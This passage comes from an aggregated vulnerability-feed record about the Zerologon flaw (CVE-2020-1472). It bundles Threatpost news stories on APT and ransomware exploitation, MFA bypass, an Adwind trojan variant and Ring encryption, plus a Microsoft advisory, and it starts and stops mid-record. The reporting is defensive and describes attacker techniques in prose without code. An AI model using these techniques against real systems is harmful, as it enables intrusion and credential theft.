advantage](<https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/>) of unpatched systems. Last month [Microsoft warned](<https://threatpost.com/microsoft-zerologon-attack-iranian-actors/159874/>) that the Iranian group MERCURY APT has been actively exploiting the flaw, while the Ryuk ransomware gang used it to [deliver a lightning-fast attack](<e%20group%20was%20able%20to%20move%20from%20initial%20phish%20to%20full%20domain-wide%20encryption%20in%20just%20five%20hours>) that moved from initial phish to full domain-wide encryption in just five hours.\n\nGiven the length of the campaign discovered, Cicada may well be one of the earliest APT groups to take advantage of Zerologon. The group is known for attacking targets in Japan as well as MSPs with living-off-the-land tools and custom malware. In the latter category, the latest campaign uses Backdoor.Hartip, which researchers said is a brand new tool for the group.\n\nIn addition to Zerologon, attackers also extensively used DLL side-loading in the campaign, a common tactic of APT groups that \u201coccurs when attackers are able to replace a legitimate library with a malicious one, allowing them to load malware into legitimate processes,\u201d researchers said. In fact, suspicious activity surrounding DLL side-loading is what tipped Symantec researchers off to campaign when it triggered an alert in Symantec\u2019s Cloud Analytics tool, they said.\n\n\u201cAttackers use DLL side-loading to try and hide their activity by making it look legitimate, and it also helps them avoid detection by security software,\u201d according to the report.\n\nOther tools attackers leveraged in the campaign included: [RAR archiving](<https://attack.mitre.org/techniques/T1560/>), which can transfer files to staging servers before exfiltration; [WMIExec](<https://attack.mitre.org/techniques/T1047/>), used for lateral movement and to execute commands remotely; Certutil, a command-line utility that can be exploited to decode information, download files and install browser root certificates; and PowerShell, an environment in the Windows OS that\u2019s often abused by threat actors. The campaign also used legitimate cloud file-hosting service for exfiltration, researchers said.\n", "modified": "2020-11-19T14:34:36", "published": "2020-11-19T14:34:36", "id": "THREATPOST:A5FC4C5797CA53E30A3426AF0843BFFE", "href": "https://threatpost.com/apt-exploits-zerologon-targets-japanese-companies/161383/", "type": "threatpost", "title": "APT Exploits Microsoft Zerologon Bug: Targets Japanese Companies", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-15T21:53:29", "bulletinFamily": "info", "cvelist": ["CVE-2020-1472"], "description": "Microsoft is taking matters into its own hands when it comes to companies that haven\u2019t yet updated their systems to address the critical Zerologon flaw. The tech giant will soon by default block vulnerable connections on devices that could be used to exploit the flaw.\n\nStarting Feb. 9, Microsoft said it will enable domain controller \u201cenforcement mode\u201d by default, a measure that would help mitigate the threat.\n\nMicrosoft Active Directory domain controllers are at the heart of the Zerologon vulnerability. Domain controllers respond to authentication requests and verify users on computer networks. [A successful exploit of the flaw](<https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/>) allows unauthenticated attackers with network access to domain controllers to completely compromise all Active Directory identity services.\n\n[](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit>)\n\nClick to Register \u2013 New Browser Tab Opens\n\nDomain Controller enforcement mode \u201cwill block vulnerable connections from non-compliant devices,\u201d said Aanchal Gupta, VP of engineering with Microsoft [in a Thursday post](<https://msrc-blog.microsoft.com/2021/01/14/netlogon-domain-controller-enforcement-mode-is-enabled-by-default-beginning-with-the-february-9-2021-security-update-related-to-cve-2020-1472/>). \u201cDC enforcement mode requires that all Windows and non-Windows devices use secure RPC with Netlogon secure channel unless customers have explicitly allowed the account to be vulnerable by adding an exception for the non-compliant device.\u201d\n\nSecure RPC is an authentication method that authenticates both the host and the user who is making a request for a service.\n\nThis new implementation is an attempt to block cybercriminals from gaining network access to domain controllers, which they can utilize to exploit the Zerologon privilege-escalation glitch ([CVE-2020-1472](<https://www.tenable.com/cve/CVE-2020-1472>)). The flaw, with a critical-severity CVSS score of 10 out of 10, was first addressed in [Microsoft\u2019s August 2020 security updates](<https://threatpost.com/microsoft-out-of-band-security-update-windows-remote-access-flaws/158511/>). But [starting in September](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>), at least four public Proof-of-Concept (PoC) exploits for the flaw were released on** **[Github,](<https://github.com/dirkjanm/CVE-2020-1472>) along with technical details of the vulnerability.\n\nThe enforcement mode \u201cis a welcome move because it is such a potentially damaging vulnerability that could be used to hijack full Domain Admin privileges \u2013 the \u2018Crown Jewels\u2019 of any network providing an attacker with God-mode for the Windows server network,\u201d Mark Kedgley, CTO at New Net Technologies (NNT), told Threatpost. \u201cBy defaulting this setting it is clear that it is seen as too dangerous to leave open. [The] message to everyone is to patch often and regularly and ensure your secure configuration build standard is up to date with the latest [Center for Internet Security] or [Security Technical Implementation Guide] recommendations.\u201d\n\nZerologon has grown more serious over the past few months as several threat actors and advanced persistent threat (APT) groups closed in on the flaw, including cybercriminals like the [China-backed APT Cicada](<https://threatpost.com/apt-exploits-zerologon-targets-japanese-companies/161383/>) and [the MERCURY APT group](<https://threatpost.com/microsoft-zerologon-attack-iranian-actors/159874/>).\n\n\u201cReported attacks began occurring within just two weeks of the vulnerability being disclosed,\u201d Ivan Righi, cyber threat intelligence analyst at Digital Shadows, told Threatpost. \u201cAPT10 (aka Cicada, Stone Panda, and Cloud Hoppe) was also observed leveraging Zerologon to target Japanese companies in November 2020.\u201d\n\nThe U.S. government has also stepped in to rally organizations to update after the publication of the exploits, with the DHS issuing [a rare emergency directive](<https://cyber.dhs.gov/assets/report/ed-20-04.pdf>) that ordered federal agencies to patch their Windows Servers against the flaw by Sept. 21.\n\nGupta for his part said that organizations can take four steps to avoid the serious flaw: Updating their domain controllers to an update released Aug. 11, 2020, or later; find which devices are making vulnerable connections (via monitoring log events); addressing those non-compliant devices making the vulnerable connections; and enabling domain controller enforcement.\n\n\u201cConsidering the severity of the vulnerability, it is advised that all Domain Controllers be updated with the latest security patch as soon as possible,\u201d Righi told Threatpost.\n\n**Supply-Chain Security: A 10-Point Audit Webinar:** _Is your company\u2019s software supply-chain prepared for an attack? On Wed., Jan. 20 at 2p.m. ET, start identifying weaknesses in your supply-chain with actionable advice from experts \u2013 part of a _[_limited-engagement and LIVE Threatpost webinar_](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>)_. CISOs, AppDev and SysAdmin are invited to ask a panel of A-list cybersecurity experts how they can avoid being caught exposed in a post-SolarWinds-hack world. Attendance is limited: _[**_Register Now_**](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>)_ and reserve a spot for this exclusive Threatpost _[_Supply-Chain Security webinar_](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>)_ \u2013 Jan. 20, 2 p.m._\n", "modified": "2021-01-15T21:47:20", "published": "2021-01-15T21:47:20", "id": "THREATPOST:27150C099FB4771B9DED4F6372D27EB7", "href": "https://threatpost.com/microsoft-implements-windows-zerologon-flaw-enforcement-mode/163104/", "type": "threatpost", "title": "Microsoft Implements Windows Zerologon Flaw 'Enforcement Mode'", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-15T21:55:38", "bulletinFamily": "info", "cvelist": ["CVE-2020-1472"], "description": "The Feds are warning that cybercriminals are bypassing multi-factor authentication (MFA) and successfully attacking cloud services at various U.S. organizations.\n\nAccording to an alert issued Wednesday by the Cybersecurity and Infrastructure Security Agency (CISA), there have been \u201cseveral recent successful cyberattacks\u201d focused on compromising the cloud. Most of the attacks are opportunistic, taking advantage of poor cloud cyber-hygiene and misconfigurations, according to the agency.\n\n\u201cThese types of attacks frequently occurred when victim organizations\u2019 employees worked remotely and used a mixture of corporate laptops and personal devices to access their respective cloud services,\u201d the alert outlined. \u201cDespite the use of security tools, affected organizations typically had weak cyber-hygiene practices that allowed threat actors to conduct successful attacks.\u201d\n\n[](<https://threatpost.com/2020-reader-survey/161168/>)\n\nFor instance, in one case, an organization did not require a virtual private network (VPN) for remote employees accessing the corporate network.\n\n\u201cAlthough their terminal server was located within their firewall, due to remote work posture, the terminal server was configured with port 80 open to allow remote employees to access it\u2014leaving the organization\u2019s network vulnerable [to brute-forcing],\u201d CISA explained.\n\nThe agency also noted that phishing and possibly a \u201cpass-the-cookie\u201d attack have been the primary attack vectors for the cloud attacks.\n\n## **Phishing and Bypassing MFA**\n\nOn the phishing front, targets are being sent emails containing malicious links, which purport to take users to a \u201csecure message.\u201d Other emails masquerade as alerts for legitimate file hosting services. In both cases, the links take targets to a phishing page, where they\u2019re asked to provide account credentials. The cybercriminals thus harvest these and use them to log into cloud services.\n\n\u201cCISA observed the actors\u2019 logins originating from foreign locations (although the actors could have been using a proxy or The Onion Router (Tor) to obfuscate their location),\u201d according to the alert. \u201cThe actors then sent emails from the user\u2019s account to phish other accounts within the organization. In some cases, these emails included links to documents within what appeared to be the organization\u2019s file-hosting service.\u201d\n\nMeanwhile, attackers have been able to bypass MFA using a [\u201cpass-the-cookie\u201d attack](<https://stealthbits.com/blog/bypassing-mfa-with-pass-the-cookie/>). Browser cookies are used to store user authentication information so a website can keep a user signed in. The authentication information is stored in a cookie after the MFA test is satisfied, so the user isn\u2019t prompted for an MFA check again.\n\nThus, if attackers extract the right browser cookies they can authenticate as a targeted user in a separate browser session, bypassing all MFA checkpoints. As explained in a recent posting from Stealthbits, an attacker would need to convince a user to click on a phishing email or otherwise compromise a user\u2019s system, after which it\u2019s possible to execute code on the machine. A simple command would allow an attacker to extract the appropriate cookie.\n\n\u201cIt is important to note that not understanding the weaknesses and potential hacking bypasses of MFA is almost as bad as not using it,\u201d said Roger Grimes, data-driven defense evangelist at KnowBe4, via email. \u201cIf you think you\u2019re far less likely to be hacked because of MFA (and that isn\u2019t true), then you are more likely to let your defenses down. But if you understand how MFA can be attacked, and share that with the end users of the MFA and designers of the systems that it relies on, you\u2019re more likely to get a better, less risky outcome. The key is to realize that everything can be hacked. MFA doesn\u2019t impart some special, magical defense that no hacker can penetrate. Instead, strong security awareness training around any MFA solution is crucial, because to do otherwise is to be unprepared and more at risk.\u201d\n\n## **Exploiting Forwarding Rules**\n\nCISA said that it has also observed threat actors, post-initial compromise, collecting sensitive information by taking advantage of email forwarding rules.\n\nForwarding rules allow users to send work emails to their personal email accounts \u2013 a useful feature for remote workers.\n\nCISA said that it has observed threat actors modifying an existing email rule on a user\u2019s account to redirect the emails to attacker-controlled accounts.\n\n\u201cThreat actors also modified existing rules to search users\u2019 email messages (subject and body) for several finance-related keywords (which contained spelling mistakes) and forward the emails to the threat actors\u2019 account,\u201d according to the agency. \u201cThe threat actors [also] created new mailbox rules that forwarded certain messages received by the users (specifically, messages with certain phishing-related keywords) to the legitimate users\u2019 RSS Feeds or RSS Subscriptions folder in an effort to prevent warnings from being seen by the legitimate users.\u201d\n\n## **Cloud Security**\n\nCloud adoption, spurred by pandemic work realities, will only [accelerate in the year ahead](<https://threatpost.com/2021-cybersecurity-trends/162629/>) with software-as-a-service, cloud-hosted processes and storage driving the charge. A study by Rebyc found that 35 percent of companies surveyed said they plan to accelerate workload migration to the cloud in 2021.\n\nBudget allocations to cloud security will double as companies look to protect cloud buildouts in the year ahead, according to Gartner.\n\n\u201c[Companies] by shifting the responsibility and work of running hardware and software infrastructure to cloud providers, leveraging the economics of cloud elasticity, benefiting from the pace of innovation in sync with public cloud providers, and more,\u201d said David Smith, distinguished VP Analyst at Gartner.\n\nAccordingly, cloud applications and environments are increasingly[ in the sights of attackers](<https://threatpost.com/cloud-king-software-security-trends-2021/162442/>). In December for instance, the National Security Agency issued a warning that threat actors have developed techniques to leverage vulnerabilities in on-premises network access to [compromise the cloud](<https://media.defense.gov/2020/Dec/17/2002554125/-1/-1/0/AUTHENTICATION_MECHANISMS_CSA_U_OO_198854_20.PDF>).\n\n\u201cMalicious cyber-actors are abusing trust in federated authentication environments to access protected data,\u201d the advisory read. \u201cThe exploitation occurs after the actors have gained initial access to a victim\u2019s on-premises network. The actors leverage privileged access in the on-premises environment to subvert the mechanisms that the organization uses to grant access to cloud and on-premises resources and/or to compromise administrator credentials with the ability to manage cloud resources.\u201d\n\n**Supply-Chain Security: A 10-Point Audit Webinar:** _Is your company\u2019s software supply-chain prepared for an attack? On Wed., Jan. 20 at 2p.m. ET, start identifying weaknesses in your supply-chain with actionable advice from experts \u2013 part of a [limited-engagement and LIVE Threatpost webinar](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>). CISOs, AppDev and SysAdmin are invited to ask a panel of A-list cybersecurity experts how they can avoid being caught exposed in a post-SolarWinds-hack world. Attendance is limited: **[Register Now](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>)** and reserve a spot for this exclusive Threatpost [Supply-Chain Security webinar](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>) \u2013 Jan. 20, 2 p.m. ET._\n\n_ _\n", "modified": "2021-01-14T16:45:04", "published": "2021-01-14T16:45:04", "id": "THREATPOST:BBAE8AE32C2E8EC0271BBA9D0498A825", "href": "https://threatpost.com/cloud-attacks-bypass-mfa-feds/163056/", "type": "threatpost", "title": "Cloud Attacks Are Bypassing MFA, Feds Warn", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-02T21:47:09", "bulletinFamily": "info", "cvelist": ["CVE-2020-1472"], "description": "A spike in exploitation attempts against the Microsoft vulnerability CVE-2020-1472, known as the Zerologon bug, continues to plague businesses.\n\nThat\u2019s according to researchers from Cisco Talos, who warned that cybercriminals are redoubling their efforts to trigger the elevation-of-privilege bug in the Netlogon Remote Protocol, which was addressed in the August Microsoft Patch Tuesday report. Microsoft announced last week that it had started observing active exploitation in the wild: \u201cWe have observed attacks where public exploits have been incorporated into attacker playbooks,\u201d the firm [tweeted on Wednesday](<https://twitter.com/MsftSecIntel/status/1308941504707063808>).\n\nNow, the volume of those attacks is ramping up, according to Cisco Talos, and the stakes are high. Netlogon, available on Windows domain controllers, is used for various tasks related to user- and machine-authentication. A successful exploit allows an unauthenticated attacker with network access to a domain controller (DC) to completely compromise all Active Directory identity services, according to Microsoft.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThis flaw allows attackers to impersonate any computer, including the domain controller itself and gain access to domain admin credentials,\u201d added Cisco Talos, [in a writeup](<https://blog.talosintelligence.com/2020/09/netlogon-rises.html#more>) on Monday. \u201cThe vulnerability stems from a flaw in a cryptographic authentication scheme used by the Netlogon Remote Protocol which \u2014 among other things \u2014 can be used to update computer passwords by forging an authentication token for specific Netlogon functionality.\u201d\n\nFour proof-of-concept (PoC) exploits [were recently released](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>) for the issue, which is a critical flaw rating 10 out of 10 on the CvSS severity scale. That prompted the U.S. [Cybersecurity and Infrastructure Security Agency](<https://cyber.dhs.gov/assets/report/ed-20-04.pdf>) (PDF) issued a dire warning that the \u201cvulnerability poses an unacceptable risk to the Federal Civilian Executive Branch and requires an immediate and emergency action.\u201d It also mandated that federal agencies patch their Windows Servers against Zerologon, in a rare emergency directive issued by the Secretary of Homeland Security.\n\n## **Two-Phased Patching**\n\nMicrosoft\u2019s patch process for Zerologon is a phased, two-part rollout.\n\nThe initial patch for the vulnerability was issued as part of the computing giant\u2019s [August 11 Patch Tuesday security updates](<https://threatpost.com/microsoft-out-of-band-security-update-windows-remote-access-flaws/158511/>), which addresses the security issue in Active Directory domains and trusts, as well as Windows devices.\n\nHowever, to fully mitigate the security issue for third-party devices, users will need to not only update their domain controllers, but also enable \u201cenforcement mode.\u201d They should also monitor event logs to find out which devices are making vulnerable connections and address non-compliant devices, according to Microsoft.\n\n\u201cStarting February 2021, enforcement mode will be enabled on all Windows Domain Controllers and will block vulnerable connections from non-compliant devices,\u201d it said. \u201cAt that time, you will not be able to disable enforcement mode.\u201d\n\nLast week, both Samba and 0patch [issued fixes](<https://threatpost.com/zerologon-patches-beyond-microsoft/159513/>) for CVE-2020-1472, to fill in the some of the gaps that the official patch doesn\u2019t address, such as end-of-life versions of Windows, in the case of the latter.\n\nSamba, a third-party file-sharing utility for swapping materials between Linux and Windows systems, relies on the Netlogon protocol, and thus suffers from the vulnerability. The bug exists when Samba is used as domain controller only (most seriously the Active Directory DC, but also the classic/NT4-style DC),\n", "modified": "2020-09-29T18:13:47", "published": "2020-09-29T18:13:47", "id": "THREATPOST:45F91A2DD716E93AA4DA0D9441E725C6", "href": "https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/", "type": "threatpost", "title": "Zerologon Attacks Against Microsoft DCs Snowball in a Week", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-06T21:56:58", "bulletinFamily": "info", "cvelist": ["CVE-2020-1472"], "description": "A new version of the Adwind remote access trojan (RAT) has been discovered taking aim at new targets.\n\nAdwind (a.k.a. JRAT or SockRat) is a Java-based remote access trojan that sniffs out data \u2013 mainly login credentials \u2013 from victims\u2019 machines. While Adwind has historically been platform-agnostic, researchers say they have discovered a new four-month-old version targeting specifically Windows applications \u2013 like Explorer and Outlook \u2013 as well as Chromium-based browsers (Chromium is a free and open-source web browser developed by Google), including newer browsers like Brave.\n\nThe swap up in targeting \u201cshows that attackers are closely keeping track of newly released applications that are gaining traction amongst end users and adapt their RAT functionality to steal information from these new applications,\u201d Krishnan Subramanian, security researcher at Menlo Labs, told Threatpost.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe new variant is a JAR file (Java ARchive; a package file format typically used to aggregate many Java class files) that researchers say is typically delivered from a link in a phishing email or downloaded from a legitimate site serving up insecure third-party content.\n\nResearchers said they have also observed many infections originating from outdated WordPress sites, which is \u201cgrowing in popularity due to the vulnerabilities in the publishing platform.\u201d\n\n\u201cGoing by the uptick in the number of wordpress vulnerabilities being exploited in the wild, we believe that the initial JAR file was served from compromised WordPress servers,\u201d Subramanian told Threatpost.\n\n## Attack Vector\n\nOnce delivered, this new Adwind variant obfuscates the initial JAR file, blocking against any signature-based detection methods.\n\n\u201cMalware that takes advantage of common Java functionality is notoriously difficult to detect or detonate in a sandbox for the simple fact that Java is so common on the web,\u201d researchers with Menlo Security said in a [Tuesday post](<https://www.menlosecurity.com/blog/hiding-in-plain-sight-new-adwind-jrat-variant-uses-normal-java-commands-to-mask-its-behavior?hs_preview=YMFZfJZD-19402234706>). \u201cIn fact, any effort to block or limit Java would result in much of the internet breaking down \u2014 a non-starter for users who increasingly rely on rich web apps or SaaS platforms for their day-to-day responsibilities.\u201d\n\nThe JAR file then decrypts and loads a loader, which then loads an initial set of modules and sends out a request that is responsible for initializing the RAT with the command-and-control (C2) server.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/10/29114503/RAT-Blog.png>)\n\nAdwind is then able to decrypt a configuration file to get a list of C2 server IP addresses. Once an address is selected, an AES-encrypted request is made (via TCP Port 80) to remotely load a set of additional JAR files, researchers said.\n\nOnce downloaded, the JAR files activate the trojan, which becomes fully functional and is able to send a C2 request to access and send credentials from the browser and various Windows applications to a remote server.\n\nThese credentials can include personal bank credentials or business app logins \u2013 basically any password saved in a browser or application running on Windows.\n\nAdwind has been around for a while, but continues to make waves with evolving variants and new targets.\n\nThe trojan was most recently seen in an [August 2019 phishing campaign](<https://threatpost.com/adwind-spyware-as-a-service-attacks-utility-grid-operators/147525/>) that took aim at national grid utilities infrastructure. Adwind, was being used as a a malware-as-a-service model in that campaign, researchers said, with features including the ability to take screenshots, harvest credentials from Chrome, Internet Explorer and Microsoft Edge, record video and audio, take photos, steal files, perform keylogging, read emails and steal VPN certificates.\n\n## Detection Difficult\n\nAdwind has made bypassing and disabling security tools a hallmark. Last year, [a new variant emerged](<https://threatpost.com/adwind-rat-scurries-by-av-software-with-new-dde-variant/137661/>) that used a fresh take on the Dynamic Data Exchange (DDE) code-injection technique for anti-virus evasion.\n\nMost notably, the Adwind trojan is able to mask its behavior by acting like any other Java command, researchers said.\n\n\u201cWithout dynamic construction of the initial JAR file, threat intelligence has very little or no heuristics with which to create a static rule or signature that can effectively detect the initial JAR payload among the millions of Java commands flowing in and out of the corporate network,\u201d said researchers. \u201cIt\u2019s like wading through a crowd of a million people and trying to pick out the one person wearing a green undershirt without being able to look under people\u2019s jackets. There\u2019s nothing suspicious about its existence, its appearance or even its initial behavior. Everything about it seems normal.\u201d\n\n_**What are the top mistakes leading to data breaches at modern enterprises? Find out: Join experts from SpyCloud and Threatpost senior editor Tara Seals on our upcoming free **_[_**Threatpost webinar**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**, \u201cTrends in Fortune 1000 Breach Exposure.\u201d **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**.**_\n", "modified": "2019-10-29T16:17:02", "published": "2019-10-29T16:17:02", "id": "THREATPOST:F1065D29808C9165285986CCB6DEBB5A", "href": "https://threatpost.com/new-adwind-variant-windows-chromium-credentials/149642/", "type": "threatpost", "title": "New Adwind Variant Targets Windows, Chromium Credentials", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-15T21:53:15", "bulletinFamily": "info", "cvelist": ["CVE-2020-1472"], "description": "Smart doorbell maker Ring is giving cybersecurity critics less to gripe about with the introduction of end-to-end encryption to many of its models. Ring products, which have been a juggernaut success with consumers, have faced a litany of harsh criticism from cybersecurity experts for what they say is a [lack of attention to basic digital security](<https://threatpost.com/fbi-ring-smart-doorbells-sabotage-cops/158837/>).\n\nAfter a much anticipated response to critics, Ring this week rolled out end-to-end encryption for many of its home security camera products. End-to-end encryption, according to Ring, can be added to less than 50 percent of its in-use products. Older model smart-doorbell products, such as its first and second-generation video doorbells, cannot be upgraded with the added protection.\n\nThe move was anticipated, but initiated later than planned. \n[](<https://threatpost.com/2020-reader-survey/161168/>)\n\nTechnical specifics by the Amazon-owned company Ring [were made available on Wednesday](<https://assets.ctfassets.net/a3peezndovsu/5jmqFoKyaCXpL2qBG46Zqn/72d138d896e7460c5bdae07992ad491e/Ring_Encryption_Whitepaper.pdf>) (PDF) as part of a technical preview of the new security measures. Ring\u2019s end-to-end encryption plans was first announced in September and originally slated to be introduced by the end of 2020.\n\nThe feature\u2014which will be optional and free for customers\u2014will allow only the device authorized and enrolled with the associated Ring account to accept and access the live Ring video stream. If third parties want to view a recording or stream on another device, they will need access to an encryption key stored on the mobile device authorized to view the stream.\n\nIt\u2019s unclear how [law enforcements\u2019 access to Ring doorbell feeds](<https://threatpost.com/rings-police-partnerships-racial-bias/157140/>) might be impacted \u2013 if at all.\n\n## **Clamoring Critics**\n\nThe company has faced years of criticism for flaws in the system that opened video and data collected by the system to be stolen by threat actors. Still other critics blasted Ring for what they said were the company\u2019s own dodgy data-collection practices.\n\nLast year, Amazon [patched a vulnerability](<https://threatpost.com/senators-amazon-ring-privacy-policies/150533/>) in the Ring smart doorbell that could have allowed attackers to access the owner\u2019s Wi-Fi network credentials and potentially reconfigure the device to launch an attack on the home network.\n\nA couple of days later, five U.S. Senators demanded in a letter to Amazon CEO Jeff Bezos that Amazon disclose how it\u2019s securing Ring home-security device footage\u2013and who is allowed to access that footage.\n\nLast October, Ring raised privacy hackles again when [it unveiled](<https://threatpost.com/ring-drone-privacy/159562/>) the new Always Home Cam, a smart home security camera drone that flies around homes taking security footage of people inside their own homes. Due to Amazon\u2019s already questionable data-collection practices, privacy advocates worried that the footage could fall into the wrong hands.\n\n## **Front Door Mitigations **\n\nOn Wednesday, Ring outlined how it would specifically address those concerns. It said Ring will add an extra layer of security and privacy in addition to Ring\u2019s existing encryption, which by default encrypts videos when they are uploaded to the cloud and stored on Ring\u2019s servers, the company said.\n\n\u201cWith End-to-End Encryption, customer videos are further secured with an additional lock, which can only be unlocked by a key that is stored on the customer\u2019s enrolled mobile device, designed so that only the customer can decrypt and view recordings on their enrolled device,\u201d according to a [Ring blog post](<https://blog.ring.com/2021/01/13/ring-launches-video-end-to-end-encryption/>) about the rollout.\n\nRing said the service gives users \u201ccontrol and additional choices for encrypting and decrypting their videos and is designed so that no unauthorized third party can access user video content,\u201d according to a [whitepaper](<https://threatpost.com/hacks-android-windows-zero-day/163007/>) Ring posted online about the service.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/01/14080350/Ring_End_to_End_Encryption.jpg>)\n\nRing Diagram of End-to-End Encryption Overview\n\nVideos encrypted when the feature is turned off will still be encrypted if the user decides to disable end-to-end encryption, according to the whitepaper, which also provides step-by-step instructions about how the feature works as well as specific details about what type of encryption the company is using.\n\nEnd-to-end encryption certainly adds a layer of privacy that many customers and privacy advocates have long wanted from Ring, which since its inception has constantly pushed the boundaries of how much privacy people are willing to give up for home security protection.\n\n## **Following Zoom\u2019s Lead**\n\nThe move to add end-to-end encryption to Ring is similar to one that online videoconferencing service [Zoom took last year](<https://threatpost.com/zoom-end-to-end-encryption-paying-users/156286/>) to encrypt video streams amid privacy concerns and numerous security breaches of the service, such as [Zoom bombing](<https://threatpost.com/fbi-threatens-zoom-bombing-trolls-with-jail-time/154495/>) and [zero-day vulnerabilities](<https://threatpost.com/alleged-zoom-zero-days-for-windows-macos-for-sale-report/154846/>), among others. Zoom, however, made the feature available to only paid users of the service.\n\nWhile Ring\u2019s new feature has privacy and security benefits, it also will disrupt some existing features of the service, such as accessing Ring video through Alexa, and Echo Show or Fire TV device, or sharing with other cameras.\n\nThe encryption also may throw a wrench in [controversial plans](<https://threatpost.com/fbi-ring-smart-doorbells-sabotage-cops/158837/>) to use Ring\u2019s Neighbors app to share data footage from Ring devices with law enforcement, such as what\u2019s happening in [a program being tested by police](<https://threatpost.com/police-livestream-ring-camera-mississippi/160936/>) in Mississippi in which they can livestream video from Ring cameras installed at private homes and businesses. When launched, the program sounded an alarm bell with privacy advocates like the Electronic Frontier Foundation, which [called the launch](<https://www.eff.org/deeplinks/2020/11/police-will-pilot-program-live-stream-amazon-ring-cameras>) of the program its \u201cworst fears\u201d being \u201cconfirmed.\u201d\n\nHowever, as the feature is optional and Ring users can choose to share encryption keys with third parties, it will still be possible to both stream video to other devices and share video streams with law enforcement if the owner of the device so chooses.\n\n**Supply-Chain Security: A 10-Point Audit Webinar:** _Is your company\u2019s software supply-chain prepared for an attack? On Wed., Jan. 20 at 2p.m. ET, start identifying weaknesses in your supply-chain with actionable advice from experts \u2013 part of a [limited-engagement and LIVE Threatpost webinar](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>). CISOs, AppDev and SysAdmin are invited to ask a panel of A-list cybersecurity experts how they can avoid being caught exposed in a post-SolarWinds-hack world. Attendance is limited: **[Register Now](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>)** and reserve a spot for this exclusive Threatpost [Supply-Chain Security webinar](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>) \u2013 Jan. 20, 2 p.m. ET._\n", "modified": "2021-01-14T13:28:22", "published": "2021-01-14T13:28:22", "id": "THREATPOST:6B7259AD7487C6D17E0A301E14AEB7CB", "href": "https://threatpost.com/ring-adds-end-to-end-encryption-to-quell-security-uproar/163042/", "type": "threatpost", "title": "Ring Adds End-to-End Encryption to Quell Security Uproar", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2021-02-09T21:36:47", "bulletinFamily": "microsoft", "cvelist": ["CVE-2020-1472"], "description": "An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol ([MS-NRPC](<https://docs.microsoft.com/openspecs/windows_protocols/ms-nrpc/ff8f970f-3e37-40f7-bd4b-af7336e4792f>)). An attacker who successfully exploited the vulnerability could run a specially crafted application on a device on the network.\n\nTo exploit the vulnerability, an unauthenticated attacker would be required to use MS-NRPC to connect to a domain controller to obtain domain administrator access.\n\nMicrosoft is addressing the vulnerability in a phased two-part rollout. These updates address the vulnerability by modifying how Netlogon handles the usage of Netlogon secure channels.\n\nFor guidelines on how to manage the changes required for this vulnerability and more information on the phased rollout, see [How to manage the changes in Netlogon secure channel connections associated with CVE-2020-1472](<https://support.microsoft.com/kb/4557222>) (updated September 28, 2020).\n\nWhen the second phase of Windows updates become available in Q1 2021, customers will be notified via a revision to this security vulnerability. If you wish to be notified when these updates are released, we recommend that you register for the security notifications mailer to be alerted of content changes to this advisory. See [Microsoft Technical Security Notifications](<https://technet.microsoft.com/en-us/security/dd252948>).\n", "edition": 5, "modified": "2021-02-09T08:00:00", "id": "MS:CVE-2020-1472", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472", "published": "2021-02-09T08:00:00", "title": "Netlogon Elevation of Privilege Vulnerability", "type": "mscve", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2021-01-19T20:27:05", "bulletinFamily": "blog", "cvelist": ["CVE-2020-1472"], "description": "This is the story of a vulnerability that was brought about by the incorrect use of an encryption technique. After it was discovered by researchers, the vulnerability was patched and that should have been the end of the story. Unfortunately the patch caused problems of its own, which made it very unpopular. Cybercriminals seized the opportunity to use the vulnerability for their own purposes. This is the story of ZeroLogon.\n\n### What is ZeroLogon?\n\nThe ZeroLogon vulnerability was discovered by researchers at Secura and is listed in the Common Vulnerabilities and Exposures (CVE) database under 